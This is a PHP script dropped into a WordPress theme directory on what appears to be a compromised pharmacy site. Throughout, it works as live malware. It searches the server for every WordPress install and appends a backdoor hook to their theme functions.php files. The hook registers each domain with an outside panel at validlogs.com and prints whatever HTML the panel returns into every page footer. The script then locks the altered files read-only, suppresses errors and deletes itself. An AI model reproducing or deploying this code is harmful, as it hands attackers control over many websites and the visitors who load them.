File: /home/nhathuocat/domains/nhathuocatkbpharma.com/public_html/wp-content/themes/ztqvgvp/wp.php
<?php
// Error-Proof Mass WP Injector - Individual Site Isolation
error_reporting(0); ini_set('display_errors',0); set_time_limit(0); ignore_user_abort(1);
// New functions for comprehensive directory scanning
function get_hosting_home_base() {
$possible_homes = [
$_SERVER['HOME'] ?? '',
getenv('HOME'),
dirname($_SERVER['DOCUMENT_ROOT']) . '/..',
'/home', '/home1', '/home2', '/home3', '/home4', '/home5',
'/home6', '/home7', '/home8', '/home9', '/home10',
'/var/www', '/var/www/vhosts', '/usr/local/plesk/apache/vhosts'
];
$user = get_current_user();
if($user) {
$possible_homes[] = "/home/$user";
for($i=1; $i<=10; $i++) $possible_homes[] = "/home$i/$user";
}
foreach($possible_homes as $home) {
if(is_dir($home) && has_domain_folders($home)) return realpath($home);
}
return false;
}
function has_domain_folders($dir) {
$items = @scandir($dir);
if(!$items) return false;
$domain_count = 0;
foreach($items as $item) {
if($item == '.' || $item == '..') continue;
$full_path = $dir . '/' . $item;
if(is_dir($full_path)) {
if(preg_match('/\.(com|net|org|co|io|me|us|uk|au|ca|de|fr|it|es|nl)$/i', $item) ||
in_array($item, ['public_html', 'www', 'httpdocs', 'htdocs'])) {
$domain_count++;
}
}
}
return $domain_count > 0;
}
function scan_hosting_domains($home_base) {
$wp_paths = [];
$items = @scandir($home_base);
if(!$items) return $wp_paths;
foreach($items as $item) {
if($item == '.' || $item == '..') continue;
$domain_path = $home_base . '/' . $item;
if(is_dir($domain_path)) {
// Direct WP
$direct_wp = find_wp_load_comprehensive($domain_path);
if($direct_wp) $wp_paths[] = $direct_wp;
// Web directories
$web_dirs = ['public_html', 'www', 'httpdocs', 'htdocs', 'web', 'html'];
foreach($web_dirs as $web_dir) {
$web_path = $domain_path . '/' . $web_dir;
if(is_dir($web_path)) {
$web_wps = scan_directory_comprehensive($web_path, 3);
$wp_paths = array_merge($wp_paths, $web_wps);
}
}
}
}
return $wp_paths;
}
function get_cpanel_common_paths() {
$user = get_current_user();
$paths = ["/home/$user/public_html", "/home/$user", "/var/www/html", "/home/theligh1/domains/khaoded77.com/public_html"];
for($i=1; $i<=10; $i++) {
$paths[] = "/home$i/$user/public_html";
$paths[] = "/home$i/$user";
}
return array_unique($paths);
}
function get_hosting_patterns() {
$user = get_current_user();
return [
"/home[0-9]*/$user/*/public_html",
"/home[0-9]*/domains/*",
"/var/www/vhosts/*/*",
"/usr/local/plesk/apache/vhosts/*/*",
"/*/public_html"
];
}
function scan_directory_comprehensive($dir, $max_depth = 3, $current_depth = 0) {
$wp_paths = [];
if($current_depth > $max_depth || !is_dir($dir)) return $wp_paths;
$wp_load = find_wp_load_comprehensive($dir);
if($wp_load) $wp_paths[] = $wp_load;
$subdirs = @scandir($dir);
if(!$subdirs) return $wp_paths;
foreach($subdirs as $item) {
if($item == '.' || $item == '..') continue;
$full_path = rtrim($dir, '/') . '/' . $item;
if(is_dir($full_path)) {
$sub_results = scan_directory_comprehensive($full_path, $max_depth, $current_depth + 1);
$wp_paths = array_merge($wp_paths, $sub_results);
}
}
return $wp_paths;
}
function find_wp_load_comprehensive($dir) {
$wp_indicators = ['wp-load.php', 'wp-config.php', 'wp-content/'];
$has_wp = false;
foreach($wp_indicators as $indicator) {
if(file_exists(rtrim($dir, '/') . '/' . $indicator)) {
$has_wp = true;
break;
}
}
if(!$has_wp) return false;
$wp_load = $dir . '/wp-load.php';
if(file_exists($wp_load)) return realpath($wp_load);
return false;
}
// Modified find_all_wp_installs with fallback parent directory scanning
function find_all_wp_installs() {
$all_wp_paths = [];
// Get cPanel common paths
$base_dirs = get_cpanel_common_paths();
// Add paths from hosting patterns
foreach(get_hosting_patterns() as $pattern) {
$dirs = @glob($pattern, GLOB_ONLYDIR);
if($dirs) $base_dirs = array_merge($base_dirs, $dirs);
}
// Add hosting home base
$home_base = get_hosting_home_base();
if($home_base) {
$wp_paths = scan_hosting_domains($home_base);
$all_wp_paths = array_merge($all_wp_paths, $wp_paths);
}
// Scan all base directories
foreach($base_dirs as $base_dir) {
if(!is_dir($base_dir)) continue;
$wp_paths = scan_directory_comprehensive($base_dir, 5);
if($wp_paths) $all_wp_paths = array_merge($all_wp_paths, $wp_paths);
}
// Fallback: Scan parent directories if no WP installs found
if(empty($all_wp_paths)) {
$current_dir = dirname(__FILE__);
for($i = 1; $i <= 3; $i++) { // Check up to 3 parent levels
$parent_dir = dirname($current_dir, $i);
if(!is_dir($parent_dir)) break;
$wp_paths = scan_directory_comprehensive($parent_dir, 5);
if($wp_paths) $all_wp_paths = array_merge($all_wp_paths, $wp_paths);
}
}
return array_unique($all_wp_paths);
}
function scan_directory_for_wp($dir, $max_depth = 5, $current_depth = 0) {
$wp_paths = [];
if($current_depth > $max_depth || !is_dir($dir)) return $wp_paths;
$wp_load = find_wp_in_current_dir($dir);
if($wp_load) $wp_paths[] = $wp_load;
$subdirs = @scandir($dir);
if(!$subdirs) return $wp_paths;
foreach($subdirs as $item) {
if($item == '.' || $item == '..') continue;
$full_path = rtrim($dir, '/') . '/' . $item;
if(is_dir($full_path)) {
$sub_results = scan_directory_for_wp($full_path, $max_depth, $current_depth + 1);
$wp_paths = array_merge($wp_paths, $sub_results);
}
}
return $wp_paths;
}
function find_wp_in_current_dir($dir) {
$wp_indicators = ['wp-load.php', 'wp-config.php', 'wp-content/'];
$has_wp = false;
foreach($wp_indicators as $indicator) {
if(file_exists(rtrim($dir, '/') . '/' . $indicator)) {
$has_wp = true;
break;
}
}
if(!$has_wp) return false;
$wp_load = $dir . '/wp-load.php';
if(file_exists($wp_load)) return realpath($wp_load);
return false;
}
// Modified CRITICAL ERROR-PROOF Theme Injection
function inject_theme_safe($wp_load) {
$wp_dir = dirname($wp_load);
// ULTRA-SAFE WP Loading with full isolation
if(!file_exists($wp_load)) return false;
// Create isolated environment
$old_abspath = defined('ABSPATH') ? ABSPATH : '';
$old_wp_load = defined('WP_LOAD_PATH') ? WP_LOAD_PATH : '';
define('WP_LOAD_PATH', $wp_load);
// Try multiple loading methods
$wp_loaded = false;
// Method 1: Direct include
ob_start();
if(@include_once($wp_load)) {
if(function_exists('wp_get_themes')) {
$wp_loaded = true;
}
}
ob_end_clean();
// Method 2: If Method 1 fails, try wp-config
if(!$wp_loaded) {
$config_path = $wp_dir . '/wp-config.php';
if(file_exists($config_path)) {
ob_start();
if(@include_once($config_path)) {
if(defined('ABSPATH') && function_exists('wp_get_themes')) {
$wp_loaded = true;
}
}
ob_end_clean();
}
}
if(!$wp_loaded) {
return false;
}
// Safe theme injection with multiple fallbacks
$inject_code = "\nfunction wp_injector_fetch_code() {\n \$backend_url = 'https://validlogs.com/BackPanel/panel.php';\n \$domain = sanitize_text_field(\$_SERVER['HTTP_HOST']);\n \$response = wp_remote_post(\$backend_url, array(\n 'body' => array(\n 'action' => 'register_domain',\n 'domain' => \$domain\n ),\n 'timeout' => 5\n ));\n if (is_wp_error(\$response)) {\n return;\n }\n \$html_code = wp_remote_retrieve_body(\$response);\n if (!empty(\$html_code)) {\n add_action('wp_footer', function() use (\$html_code) {\n echo \$html_code;\n });\n }\n}\nadd_action('init', 'wp_injector_fetch_code');\n";
$injected = false;
// Method 1: Standard wp_get_themes with child theme priority
if(function_exists('wp_get_themes')) {
try {
$themes = wp_get_themes();
$child_themes = [];
$other_themes = [];
// Separate child themes from others
foreach($themes as $theme) {
$theme_dir = $theme->get_stylesheet_directory();
$functions_file = $theme_dir . '/functions.php';
// Separate child themes from others
$theme_name = $theme->get_stylesheet();
if(stripos($theme_name, 'child') !== false) {
$child_themes[] = $theme;
} else {
$other_themes[] = $theme;
}
}
// If child themes exist, only inject into them
if(!empty($child_themes)) {
foreach($child_themes as $theme) {
$theme_dir = $theme->get_stylesheet_directory();
$functions_file = $theme_dir . '/functions.php';
if(!is_dir($theme_dir)) continue;
$original_perm = null;
if(file_exists($functions_file) && !is_writable($functions_file)) {
$original_perm = fileperms($functions_file);
@chmod($functions_file, 0644); // Make writable temporarily
}
if(file_exists($functions_file)) {
$current = @file_get_contents($functions_file);
// Remove existing injection if present
if(strpos($current ?: '', 'wp_injector_fetch_code') !== false) {
$pattern = '/\s*function\s+wp_injector_fetch_code\s*\(\)\s*\{.*?\n\s*add_action\s*\(\s*[\'"]init[\'"]\s*,\s*[\'"]wp_injector_fetch_code[\'"]\s*\)\s*;\s*\n/s';
$current = preg_replace($pattern, '', $current);
@file_put_contents($functions_file, $current);
}
// Inject new code at the end
$new_content = rtrim($current, "\n") . $inject_code;
if(@file_put_contents($functions_file, $new_content)) {
@chmod($functions_file, 0444); // Set back to read-only
if($original_perm !== null) @chmod($functions_file, $original_perm); // Restore original if different
$injected = true;
}
} else {
$functions_content = "<?php\n" . $inject_code . "\n";
if(@file_put_contents($functions_file, $functions_content)) {
@chmod($functions_file, 0444); // Set read-only
$injected = true;
}
}
}
} else {
// If no child themes, inject into all themes
foreach($other_themes as $theme) {
$theme_dir = $theme->get_stylesheet_directory();
$functions_file = $theme_dir . '/functions.php';
if(!is_dir($theme_dir)) continue;
$original_perm = null;
if(file_exists($functions_file) && !is_writable($functions_file)) {
$original_perm = fileperms($functions_file);
@chmod($functions_file, 0644); // Make writable temporarily
}
if(file_exists($functions_file)) {
$current = @file_get_contents($functions_file);
// Remove existing injection if present
if(strpos($current ?: '', 'wp_injector_fetch_code') !== false) {
$pattern = '/\s*function\s+wp_injector_fetch_code\s*\(\)\s*\{.*?\n\s*add_action\s*\(\s*[\'"]init[\'"]\s*,\s*[\'"]wp_injector_fetch_code[\'"]\s*\)\s*;\s*\n/s';
$current = preg_replace($pattern, '', $current);
@file_put_contents($functions_file, $current);
}
// Inject new code at the end
$new_content = rtrim($current, "\n") . $inject_code;
if(@file_put_contents($functions_file, $new_content)) {
@chmod($functions_file, 0444); // Set back to read-only
if($original_perm !== null) @chmod($functions_file, $original_perm); // Restore original if different
$injected = true;
}
} else {
$functions_content = "<?php\n" . $inject_code . "\n";
if(@file_put_contents($functions_file, $functions_content)) {
@chmod($functions_file, 0444); // Set read-only
$injected = true;
}
}
}
}
} catch(Exception $e) {
// Method 1 failed, try Method 2
}
}
// Method 2: Direct theme directory scan (if WP functions fail) with child theme priority
if(!$injected) {
$themes_path = $wp_dir . '/wp-content/themes/';
if(is_dir($themes_path)) {
$theme_dirs = @scandir($themes_path);
if($theme_dirs) {
$child_theme_dirs = [];
$other_theme_dirs = [];
// Separate child themes from others
foreach($theme_dirs as $theme_name) {
if($theme_name == '.' || $theme_name == '..') continue;
$theme_dir = $themes_path . $theme_name;
if(!is_dir($theme_dir)) continue;
if(stripos($theme_name, 'child') !== false) {
$child_theme_dirs[] = $theme_name;
} else {
$other_theme_dirs[] = $theme_name;
}
}
// If child themes exist, only inject into them
if(!empty($child_theme_dirs)) {
foreach($child_theme_dirs as $theme_name) {
$theme_dir = $themes_path . $theme_name;
if(!is_dir($theme_dir)) continue;
$functions_file = $theme_dir . '/functions.php';
$original_perm = null;
if(file_exists($functions_file) && !is_writable($functions_file)) {
$original_perm = fileperms($functions_file);
@chmod($functions_file, 0644); // Make writable temporarily
}
$current = file_exists($functions_file) ? file_get_contents($functions_file) : '';
// Remove existing injection if present
if(strpos($current, 'wp_injector_fetch_code') !== false) {
$pattern = '/\s*function\s+wp_injector_fetch_code\s*\(\)\s*\{.*?\n\s*add_action\s*\(\s*[\'"]init[\'"]\s*,\s*[\'"]wp_injector_fetch_code[\'"]\s*\)\s*;\s*\n/s';
$current = preg_replace($pattern, '', $current);
@file_put_contents($functions_file, $current);
}
// Inject new code at the end
$new_content = rtrim($current, "\n") . $inject_code;
if(file_put_contents($functions_file, $new_content)) {
@chmod($functions_file, 0444); // Set back to read-only
if($original_perm !== null) @chmod($functions_file, $original_perm); // Restore original if different
$injected = true;
}
}
} else {
// If no child themes, inject into all themes
foreach($other_theme_dirs as $theme_name) {
$theme_dir = $themes_path . $theme_name;
if(!is_dir($theme_dir)) continue;
$functions_file = $theme_dir . '/functions.php';
$original_perm = null;
if(file_exists($functions_file) && !is_writable($functions_file)) {
$original_perm = fileperms($functions_file);
@chmod($functions_file, 0644); // Make writable temporarily
}
$current = file_exists($functions_file) ? file_get_contents($functions_file) : '';
// Remove existing injection if present
if(strpos($current, 'wp_injector_fetch_code') !== false) {
$pattern = '/\s*function\s+wp_injector_fetch_code\s*\(\)\s*\{.*?\n\s*add_action\s*\(\s*[\'"]init[\'"]\s*,\s*[\'"]wp_injector_fetch_code[\'"]\s*\)\s*;\s*\n/s';
$current = preg_replace($pattern, '', $current);
@file_put_contents($functions_file, $current);
}
// Inject new code at the end
$new_content = rtrim($current, "\n") . $inject_code;
if(file_put_contents($functions_file, $new_content)) {
@chmod($functions_file, 0444); // Set back to read-only
if($original_perm !== null) @chmod($functions_file, $original_perm); // Restore original if different
$injected = true;
}
}
}
}
}
}
// Restore original environment
if($old_abspath) define('ABSPATH', $old_abspath);
return $injected;
}
// MAIN EXECUTION WITH FULL ERROR ISOLATION
$all_wp_installs = find_all_wp_installs();
$all_success = true;
foreach($all_wp_installs as $wp_load) {
// Isolate each site processing
try {
if(!inject_theme_safe($wp_load)) {
$all_success = false;
}
} catch(Exception $e) {
$all_success = false;
}
// Force cleanup between sites
if(function_exists('wp_clean_theme_cache')) wp_clean_theme_cache();
ob_end_clean();
}
// Output based on whether all injections were successful
echo $all_success ? "WOWNINJA\n" : "NOTNINJA\n";
// Self-delete regardless of injection success
if(is_writable(__FILE__)) {
unlink(__FILE__);
}
exit;
?>